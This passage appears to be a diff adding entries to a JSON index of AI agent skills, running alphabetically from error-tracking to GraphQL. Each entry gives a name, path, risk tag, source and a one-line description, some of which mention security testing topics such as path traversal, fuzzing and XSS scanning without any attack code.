+ "description": "You are an error tracking and observability expert specializing in implementing comprehensive error monitoring solutions. Set up error tracking systems, configure alerts, implement structured loggi...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "error-debugging-multi-agent-review",
+ "path": "skills/error-debugging-multi-agent-review",
+ "category": "uncategorized",
+ "name": "error-debugging-multi-agent-review",
+ "description": "Use when working with error debugging multi agent review",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "error-detective",
+ "path": "skills/error-detective",
+ "category": "uncategorized",
+ "name": "error-detective",
+ "description": "Search logs and codebases for error patterns, stack traces, and anomalies. Correlates errors across systems and identifies root causes.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "error-diagnostics-error-analysis",
+ "path": "skills/error-diagnostics-error-analysis",
+ "category": "uncategorized",
+ "name": "error-diagnostics-error-analysis",
+ "description": "You are an expert error analysis specialist with deep expertise in debugging distributed systems, analyzing production incidents, and implementing comprehensive observability solutions.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "error-diagnostics-error-trace",
+ "path": "skills/error-diagnostics-error-trace",
+ "category": "uncategorized",
+ "name": "error-diagnostics-error-trace",
+ "description": "You are an error tracking and observability expert specializing in implementing comprehensive error monitoring solutions. Set up error tracking systems, configure alerts, implement structured logging,",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "error-diagnostics-smart-debug",
+ "path": "skills/error-diagnostics-smart-debug",
+ "category": "uncategorized",
+ "name": "error-diagnostics-smart-debug",
+ "description": "Use when working with error diagnostics smart debug",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "error-handling-patterns",
+ "path": "skills/error-handling-patterns",
+ "category": "uncategorized",
+ "name": "error-handling-patterns",
+ "description": "Master error handling patterns across languages including exceptions, Result types, error propagation, and graceful degradation to build resilient applications. Use when implementing error handling...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "ethical-hacking-methodology",
+ "path": "skills/ethical-hacking-methodology",
+ "category": "uncategorized",
+ "name": "ethical-hacking-methodology",
+ "description": "This skill should be used when the user asks to \"learn ethical hacking\", \"understand penetration testing lifecycle\", \"perform reconnaissance\", \"conduct security scanning\", \"exploit ...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "evaluation",
+ "path": "skills/evaluation",
+ "category": "uncategorized",
+ "name": "evaluation",
+ "description": "Build evaluation frameworks for agent systems",
+ "risk": "safe",
+ "source": "https://github.com/muratcankoylan/Agent-Skills-for-Context-Engineering/tree/main/skills/evaluation",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "event-sourcing-architect",
+ "path": "skills/event-sourcing-architect",
+ "category": "uncategorized",
+ "name": "event-sourcing-architect",
+ "description": "Expert in event sourcing, CQRS, and event-driven architecture patterns. Masters event store design, projection building, saga orchestration, and eventual consistency patterns. Use PROACTIVELY for e...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "event-store-design",
+ "path": "skills/event-store-design",
+ "category": "uncategorized",
+ "name": "event-store-design",
+ "description": "Design and implement event stores for event-sourced systems. Use when building event sourcing infrastructure, choosing event store technologies, or implementing event persistence patterns.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "exa-search",
+ "path": "skills/exa-search",
+ "category": "uncategorized",
+ "name": "exa-search",
+ "description": "Semantic search, similar content discovery, and structured research using Exa API",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "executing-plans",
+ "path": "skills/executing-plans",
+ "category": "uncategorized",
+ "name": "executing-plans",
+ "description": "Use when you have a written implementation plan to execute in a separate session with review checkpoints",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "expo-deployment",
+ "path": "skills/expo-deployment",
+ "category": "uncategorized",
+ "name": "expo-deployment",
+ "description": "Deploy Expo apps to production",
+ "risk": "safe",
+ "source": "https://github.com/expo/skills/tree/main/plugins/expo-deployment",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "fal-audio",
+ "path": "skills/fal-audio",
+ "category": "uncategorized",
+ "name": "fal-audio",
+ "description": "Text-to-speech and speech-to-text using fal.ai audio models",
+ "risk": "safe",
+ "source": "https://github.com/fal-ai-community/skills/blob/main/skills/claude.ai/fal-audio/SKILL.md",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "fal-generate",
+ "path": "skills/fal-generate",
+ "category": "uncategorized",
+ "name": "fal-generate",
+ "description": "Generate images and videos using fal.ai AI models",
+ "risk": "safe",
+ "source": "https://github.com/fal-ai-community/skills/blob/main/skills/claude.ai/fal-generate/SKILL.md",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "fal-image-edit",
+ "path": "skills/fal-image-edit",
+ "category": "uncategorized",
+ "name": "fal-image-edit",
+ "description": "AI-powered image editing with style transfer and object removal",
+ "risk": "safe",
+ "source": "https://github.com/fal-ai-community/skills/blob/main/skills/claude.ai/fal-image-edit/SKILL.md",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "fal-platform",
+ "path": "skills/fal-platform",
+ "category": "uncategorized",
+ "name": "fal-platform",
+ "description": "Platform APIs for model management, pricing, and usage tracking",
+ "risk": "safe",
+ "source": "https://github.com/fal-ai-community/skills/blob/main/skills/claude.ai/fal-platform/SKILL.md",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "fal-upscale",
+ "path": "skills/fal-upscale",
+ "category": "uncategorized",
+ "name": "fal-upscale",
+ "description": "Upscale and enhance image and video resolution using AI",
+ "risk": "safe",
+ "source": "https://github.com/fal-ai-community/skills/blob/main/skills/claude.ai/fal-upscale/SKILL.md",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "fal-workflow",
+ "path": "skills/fal-workflow",
+ "category": "uncategorized",
+ "name": "fal-workflow",
+ "description": "Generate workflow JSON files for chaining AI models",
+ "risk": "safe",
+ "source": "https://github.com/fal-ai-community/skills/blob/main/skills/claude.ai/fal-workflow/SKILL.md",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "fastapi-pro",
+ "path": "skills/fastapi-pro",
+ "category": "uncategorized",
+ "name": "fastapi-pro",
+ "description": "Build high-performance async APIs with FastAPI, SQLAlchemy 2.0, and Pydantic V2. Master microservices, WebSockets, and modern Python async patterns.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "fastapi-router-py",
+ "path": "skills/fastapi-router-py",
+ "category": "uncategorized",
+ "name": "fastapi-router-py",
+ "description": "Create FastAPI routers with CRUD operations, authentication dependencies, and proper response models. Use when building REST API endpoints, creating new routes, implementing CRUD operations, or add...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "fastapi-templates",
+ "path": "skills/fastapi-templates",
+ "category": "uncategorized",
+ "name": "fastapi-templates",
+ "description": "Create production-ready FastAPI projects with async patterns, dependency injection, and comprehensive error handling. Use when building new FastAPI applications or setting up backend API projects.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "ffuf-claude-skill",
+ "path": "skills/ffuf-claude-skill",
+ "category": "uncategorized",
+ "name": "ffuf-claude-skill",
+ "description": "Web fuzzing with ffuf",
+ "risk": "safe",
+ "source": "https://github.com/jthack/ffuf_claude_skill",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "figma-automation",
+ "path": "skills/figma-automation",
+ "category": "uncategorized",
+ "name": "figma-automation",
+ "description": "Automate Figma tasks via Rube MCP (Composio): files, components, design tokens, comments, exports. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "file-organizer",
+ "path": "skills/file-organizer",
+ "category": "uncategorized",
+ "name": "file-organizer",
+ "description": "Intelligently organizes files and folders by understanding context, finding duplicates, and suggesting better organizational structures. Use when user wants to clean up directories, organize downlo...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "file-path-traversal",
+ "path": "skills/file-path-traversal",
+ "category": "uncategorized",
+ "name": "file-path-traversal",
+ "description": "This skill should be used when the user asks to \"test for directory traversal\", \"exploit path traversal vulnerabilities\", \"read arbitrary files through web applications\", \"find LFI vu...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "file-uploads",
+ "path": "skills/file-uploads",
+ "category": "uncategorized",
+ "name": "file-uploads",
+ "description": "Expert at handling file uploads and cloud storage. Covers S3, Cloudflare R2, presigned URLs, multipart uploads, and image optimization. Knows how to handle large files without blocking. Use when: f...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "find-bugs",
+ "path": "skills/find-bugs",
+ "category": "uncategorized",
+ "name": "find-bugs",
+ "description": "Find bugs, security vulnerabilities, and code quality issues in local branch changes. Use when asked to review changes, find bugs, security review, or audit code on the current branch.",
+ "risk": "safe",
+ "source": "https://github.com/getsentry/skills/tree/main/plugins/sentry-skills/skills/find-bugs",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "finishing-a-development-branch",
+ "path": "skills/finishing-a-development-branch",
+ "category": "uncategorized",
+ "name": "finishing-a-development-branch",
+ "description": "Use when implementation is complete, all tests pass, and you need to decide how to integrate the work - guides completion of development work by presenting structured options for merge, PR, or cleanup",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "firebase",
+ "path": "skills/firebase",
+ "category": "uncategorized",
+ "name": "firebase",
+ "description": "Firebase gives you a complete backend in minutes - auth, database, storage, functions, hosting. But the ease of setup hides real complexity. Security rules are your last line of defense, and they'r...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "firecrawl-scraper",
+ "path": "skills/firecrawl-scraper",
+ "category": "uncategorized",
+ "name": "firecrawl-scraper",
+ "description": "Deep web scraping, screenshots, PDF parsing, and website crawling using Firecrawl API",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "firmware-analyst",
+ "path": "skills/firmware-analyst",
+ "category": "uncategorized",
+ "name": "firmware-analyst",
+ "description": "Expert firmware analyst specializing in embedded systems, IoT security, and hardware reverse engineering.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "fix-review",
+ "path": "skills/fix-review",
+ "category": "uncategorized",
+ "name": "fix-review",
+ "description": "Verify fix commits address audit findings without new bugs",
+ "risk": "safe",
+ "source": "https://github.com/trailofbits/skills/tree/main/plugins/fix-review",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "flutter-expert",
+ "path": "skills/flutter-expert",
+ "category": "uncategorized",
+ "name": "flutter-expert",
+ "description": "Master Flutter development with Dart 3, advanced widgets, and multi-platform deployment.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "form-cro",
+ "path": "skills/form-cro",
+ "category": "uncategorized",
+ "name": "form-cro",
+ "description": "Optimize any form that is NOT signup or account registration \u2014 including lead capture, contact, demo request, application, survey, quote, and checkout forms.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "fp-ts-errors",
+ "path": "skills/fp-ts-errors",
+ "category": "uncategorized",
+ "name": "fp-ts-errors",
+ "description": "Handle errors as values using fp-ts Either and TaskEither for cleaner, more predictable TypeScript code. Use when implementing error handling patterns with fp-ts.",
+ "risk": "safe",
+ "source": "https://github.com/whatiskadudoing/fp-ts-skills",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "fp-ts-pragmatic",
+ "path": "skills/fp-ts-pragmatic",
+ "category": "uncategorized",
+ "name": "fp-ts-pragmatic",
+ "description": "A practical, jargon-free guide to fp-ts functional programming - the 80/20 approach that gets results without the academic overhead. Use when writing TypeScript with fp-ts library.",
+ "risk": "safe",
+ "source": "https://github.com/whatiskadudoing/fp-ts-skills",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "fp-ts-react",
+ "path": "skills/fp-ts-react",
+ "category": "uncategorized",
+ "name": "fp-ts-react",
+ "description": "Practical patterns for using fp-ts with React - hooks, state, forms, data fetching. Use when building React apps with functional programming patterns. Works with React 18/19, Next.js 14/15.",
+ "risk": "safe",
+ "source": "https://github.com/whatiskadudoing/fp-ts-skills",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "framework-migration-code-migrate",
+ "path": "skills/framework-migration-code-migrate",
+ "category": "uncategorized",
+ "name": "framework-migration-code-migrate",
+ "description": "You are a code migration expert specializing in transitioning codebases between frameworks, languages, versions, and platforms. Generate comprehensive migration plans, automated migration scripts, and",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "framework-migration-deps-upgrade",
+ "path": "skills/framework-migration-deps-upgrade",
+ "category": "uncategorized",
+ "name": "framework-migration-deps-upgrade",
+ "description": "You are a dependency management expert specializing in safe, incremental upgrades of project dependencies. Plan and execute dependency updates with minimal risk, proper testing, and clear migration pa",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "framework-migration-legacy-modernize",
+ "path": "skills/framework-migration-legacy-modernize",
+ "category": "uncategorized",
+ "name": "framework-migration-legacy-modernize",
+ "description": "Orchestrate a comprehensive legacy system modernization using the strangler fig pattern, enabling gradual replacement of outdated components while maintaining continuous business operations through ex",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "free-tool-strategy",
+ "path": "skills/free-tool-strategy",
+ "category": "uncategorized",
+ "name": "free-tool-strategy",
+ "description": "When the user wants to plan, evaluate, or build a free tool for marketing purposes \u2014 lead generation, SEO value, or brand awareness. Also use when the user mentions \"engineering as mar...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "freshdesk-automation",
+ "path": "skills/freshdesk-automation",
+ "category": "uncategorized",
+ "name": "freshdesk-automation",
+ "description": "Automate Freshdesk helpdesk operations including tickets, contacts, companies, notes, and replies via Rube MCP (Composio). Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "freshservice-automation",
+ "path": "skills/freshservice-automation",
+ "category": "uncategorized",
+ "name": "freshservice-automation",
+ "description": "Automate Freshservice ITSM tasks via Rube MCP (Composio): create/update tickets, bulk operations, service requests, and outbound emails. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "frontend-design",
+ "path": "skills/frontend-design",
+ "category": "uncategorized",
+ "name": "frontend-design",
+ "description": "Create distinctive, production-grade frontend interfaces with intentional aesthetics, high craft, and non-generic visual identity. Use when building or styling web UIs, components, pages, dashboard...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "frontend-dev-guidelines",
+ "path": "skills/frontend-dev-guidelines",
+ "category": "uncategorized",
+ "name": "frontend-dev-guidelines",
+ "description": "Opinionated frontend development standards for modern React + TypeScript applications. Covers Suspense-first data fetching, lazy loading, feature-based architecture, MUI v7 styling, TanStack Router...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "frontend-developer",
+ "path": "skills/frontend-developer",
+ "category": "uncategorized",
+ "name": "frontend-developer",
+ "description": "Build React components, implement responsive layouts, and handle client-side state management. Masters React 19, Next.js 15, and modern frontend architecture.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "frontend-mobile-development-component-scaffold",
+ "path": "skills/frontend-mobile-development-component-scaffold",
+ "category": "uncategorized",
+ "name": "frontend-mobile-development-component-scaffold",
+ "description": "You are a React component architecture expert specializing in scaffolding production-ready, accessible, and performant components. Generate complete component implementations with TypeScript, tests, s",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "frontend-mobile-security-xss-scan",
+ "path": "skills/frontend-mobile-security-xss-scan",
+ "category": "uncategorized",
+ "name": "frontend-mobile-security-xss-scan",
+ "description": "You are a frontend security specialist focusing on Cross-Site Scripting (XSS) vulnerability detection and prevention. Analyze React, Vue, Angular, and vanilla JavaScript code to identify injection poi",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "frontend-security-coder",
+ "path": "skills/frontend-security-coder",
+ "category": "uncategorized",
+ "name": "frontend-security-coder",
+ "description": "Expert in secure frontend coding practices specializing in XSS prevention, output sanitization, and client-side security patterns.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "frontend-slides",
+ "path": "skills/frontend-slides",
+ "category": "uncategorized",
+ "name": "frontend-slides",
+ "description": "Create stunning, animation-rich HTML presentations from scratch or by converting PowerPoint files. Use when the user wants to build a presentation, convert a PPT/PPTX to web, or create slides for a...",
+ "risk": "safe",
+ "source": "https://github.com/zarazhangrui/frontend-slides",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "frontend-ui-dark-ts",
+ "path": "skills/frontend-ui-dark-ts",
+ "category": "uncategorized",
+ "name": "frontend-ui-dark-ts",
+ "description": "Build dark-themed React applications using Tailwind CSS with custom theming, glassmorphism effects, and Framer Motion animations. Use when creating dashboards, admin panels, or data-rich interfaces...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "full-stack-orchestration-full-stack-feature",
+ "path": "skills/full-stack-orchestration-full-stack-feature",
+ "category": "uncategorized",
+ "name": "full-stack-orchestration-full-stack-feature",
+ "description": "Use when working with full stack orchestration full stack feature",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "game-art",
+ "path": "skills/game-development/game-art",
+ "category": "game-development",
+ "name": "game-art",
+ "description": "Game art principles. Visual style selection, asset pipeline, animation workflow.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "game-audio",
+ "path": "skills/game-development/game-audio",
+ "category": "game-development",
+ "name": "game-audio",
+ "description": "Game audio principles. Sound design, music integration, adaptive audio systems.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "game-design",
+ "path": "skills/game-development/game-design",
+ "category": "game-development",
+ "name": "game-design",
+ "description": "Game design principles. GDD structure, balancing, player psychology, progression.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "game-development",
+ "path": "skills/game-development",
+ "category": "uncategorized",
+ "name": "game-development",
+ "description": "Game development orchestrator. Routes to platform-specific skills based on project needs.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "gcp-cloud-run",
+ "path": "skills/gcp-cloud-run",
+ "category": "uncategorized",
+ "name": "gcp-cloud-run",
+ "description": "Specialized skill for building production-ready serverless applications on GCP. Covers Cloud Run services (containerized), Cloud Run Functions (event-driven), cold start optimization, and event-dri...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "gdpr-data-handling",
+ "path": "skills/gdpr-data-handling",
+ "category": "uncategorized",
+ "name": "gdpr-data-handling",
+ "description": "Implement GDPR-compliant data handling with consent management, data subject rights, and privacy by design. Use when building systems that process EU personal data, implementing privacy controls, o...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "gemini-api-dev",
+ "path": "skills/gemini-api-dev",
+ "category": "uncategorized",
+ "name": "gemini-api-dev",
+ "description": "Use this skill when building applications with Gemini models, Gemini API, working with multimodal content (text, images, audio, video), implementing function calling, using structured outputs, or n...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "geo-fundamentals",
+ "path": "skills/geo-fundamentals",
+ "category": "uncategorized",
+ "name": "geo-fundamentals",
+ "description": "Generative Engine Optimization for AI search engines (ChatGPT, Claude, Perplexity).",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "git-advanced-workflows",
+ "path": "skills/git-advanced-workflows",
+ "category": "uncategorized",
+ "name": "git-advanced-workflows",
+ "description": "Master advanced Git workflows including rebasing, cherry-picking, bisect, worktrees, and reflog to maintain clean history and recover from any situation. Use when managing complex Git histories, co...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "git-pr-workflows-git-workflow",
+ "path": "skills/git-pr-workflows-git-workflow",
+ "category": "uncategorized",
+ "name": "git-pr-workflows-git-workflow",
+ "description": "Orchestrate a comprehensive git workflow from code review through PR creation, leveraging specialized agents for quality assurance, testing, and deployment readiness. This workflow implements modern g",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "git-pr-workflows-onboard",
+ "path": "skills/git-pr-workflows-onboard",
+ "category": "uncategorized",
+ "name": "git-pr-workflows-onboard",
+ "description": "You are an **expert onboarding specialist and knowledge transfer architect** with deep experience in remote-first organizations, technical team integration, and accelerated learning methodologies. You",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "git-pr-workflows-pr-enhance",
+ "path": "skills/git-pr-workflows-pr-enhance",
+ "category": "uncategorized",
+ "name": "git-pr-workflows-pr-enhance",
+ "description": "You are a PR optimization expert specializing in creating high-quality pull requests that facilitate efficient code reviews. Generate comprehensive PR descriptions, automate review processes, and ensu",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "git-pushing",
+ "path": "skills/git-pushing",
+ "category": "uncategorized",
+ "name": "git-pushing",
+ "description": "Stage, commit, and push git changes with conventional commit messages. Use when user wants to commit and push changes, mentions pushing to remote, or asks to save and push their work. Also activate...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "github-actions-templates",
+ "path": "skills/github-actions-templates",
+ "category": "uncategorized",
+ "name": "github-actions-templates",
+ "description": "Create production-ready GitHub Actions workflows for automated testing, building, and deploying applications. Use when setting up CI/CD with GitHub Actions, automating development workflows, or cre...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "github-automation",
+ "path": "skills/github-automation",
+ "category": "uncategorized",
+ "name": "github-automation",
+ "description": "Automate GitHub repositories, issues, pull requests, branches, CI/CD, and permissions via Rube MCP (Composio). Manage code workflows, review PRs, search code, and handle deployments programmatically.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "github-issue-creator",
+ "path": "skills/github-issue-creator",
+ "category": "uncategorized",
+ "name": "github-issue-creator",
+ "description": "Convert raw notes, error logs, voice dictation, or screenshots into crisp GitHub-flavored markdown issue reports. Use when the user pastes bug info, error messages, or informal descriptions and wan...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "github-workflow-automation",
+ "path": "skills/github-workflow-automation",
+ "category": "uncategorized",
+ "name": "github-workflow-automation",
+ "description": "Automate GitHub workflows with AI assistance. Includes PR reviews, issue triage, CI/CD integration, and Git operations. Use when automating GitHub workflows, setting up PR review automation, creati...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "gitlab-automation",
+ "path": "skills/gitlab-automation",
+ "category": "uncategorized",
+ "name": "gitlab-automation",
+ "description": "Automate GitLab project management, issues, merge requests, pipelines, branches, and user operations via Rube MCP (Composio). Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "gitlab-ci-patterns",
+ "path": "skills/gitlab-ci-patterns",
+ "category": "uncategorized",
+ "name": "gitlab-ci-patterns",
+ "description": "Build GitLab CI/CD pipelines with multi-stage workflows, caching, and distributed runners for scalable automation. Use when implementing GitLab CI/CD, optimizing pipeline performance, or setting up...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "gitops-workflow",
+ "path": "skills/gitops-workflow",
+ "category": "uncategorized",
+ "name": "gitops-workflow",
+ "description": "Implement GitOps workflows with ArgoCD and Flux for automated, declarative Kubernetes deployments with continuous reconciliation. Use when implementing GitOps practices, automating Kubernetes deplo...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "gmail-automation",
+ "path": "skills/gmail-automation",
+ "category": "uncategorized",
+ "name": "gmail-automation",
+ "description": "Automate Gmail tasks via Rube MCP (Composio): send/reply, search, labels, drafts, attachments. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "go-concurrency-patterns",
+ "path": "skills/go-concurrency-patterns",
+ "category": "uncategorized",
+ "name": "go-concurrency-patterns",
+ "description": "Master Go concurrency with goroutines, channels, sync primitives, and context. Use when building concurrent Go applications, implementing worker pools, or debugging race conditions.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "go-playwright",
+ "path": "skills/go-playwright",
+ "category": "uncategorized",
+ "name": "go-playwright",
+ "description": "Expert capability for robust, stealthy, and efficient browser automation using Playwright Go.",
+ "risk": "safe",
+ "source": "https://github.com/playwright-community/playwright-go",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "go-rod-master",
+ "path": "skills/go-rod-master",
+ "category": "uncategorized",
+ "name": "go-rod-master",
+ "description": "Comprehensive guide for browser automation and web scraping with go-rod (Chrome DevTools Protocol) including stealth anti-bot-detection patterns.",
+ "risk": "safe",
+ "source": "https://github.com/go-rod/rod",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "godot-4-migration",
+ "path": "skills/godot-4-migration",
+ "category": "uncategorized",
+ "name": "godot-4-migration",
+ "description": "Specialized guide for migrating Godot 3.x projects to Godot 4 (GDScript 2.0), covering syntax changes, Tweens, and exports.",
+ "risk": "safe",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "godot-gdscript-patterns",
+ "path": "skills/godot-gdscript-patterns",
+ "category": "uncategorized",
+ "name": "godot-gdscript-patterns",
+ "description": "Master Godot 4 GDScript patterns including signals, scenes, state machines, and optimization. Use when building Godot games, implementing game systems, or learning GDScript best practices.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "golang-pro",
+ "path": "skills/golang-pro",
+ "category": "uncategorized",
+ "name": "golang-pro",
+ "description": "Master Go 1.21+ with modern patterns, advanced concurrency, performance optimization, and production-ready microservices.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "google-analytics-automation",
+ "path": "skills/google-analytics-automation",
+ "category": "uncategorized",
+ "name": "google-analytics-automation",
+ "description": "Automate Google Analytics tasks via Rube MCP (Composio): run reports, list accounts/properties, funnels, pivots, key events. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "google-calendar-automation",
+ "path": "skills/google-calendar-automation",
+ "category": "uncategorized",
+ "name": "google-calendar-automation",
+ "description": "Automate Google Calendar events, scheduling, availability checks, and attendee management via Rube MCP (Composio). Create events, find free slots, manage attendees, and list calendars programmatica...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "google-drive-automation",
+ "path": "skills/google-drive-automation",
+ "category": "uncategorized",
+ "name": "google-drive-automation",
+ "description": "Automate Google Drive file operations (upload, download, search, share, organize) via Rube MCP (Composio). Upload/download files, manage folders, share with permissions, and search across drives pr...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "googlesheets-automation",
+ "path": "skills/googlesheets-automation",
+ "category": "uncategorized",
+ "name": "googlesheets-automation",
+ "description": "Automate Google Sheets operations (read, write, format, filter, manage spreadsheets) via Rube MCP (Composio). Read/write data, manage tabs, apply formatting, and search rows programmatically.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "grafana-dashboards",
+ "path": "skills/grafana-dashboards",
+ "category": "uncategorized",
+ "name": "grafana-dashboards",
+ "description": "Create and manage production Grafana dashboards for real-time visualization of system and application metrics. Use when building monitoring dashboards, visualizing metrics, or creating operational ...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "graphql",
+ "path": "skills/graphql",
+ "category": "uncategorized",
+ "name": "graphql",
+ "description": "GraphQL gives clients exactly the data they need - no more, no less. One endpoint, typed schema, introspection. But the flexibility that makes it powerful also makes it dangerous. Without proper co...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "graphql-architect",
+ "path": "skills/graphql-architect",
+ "category": "uncategorized",
+ "name": "graphql-architect",
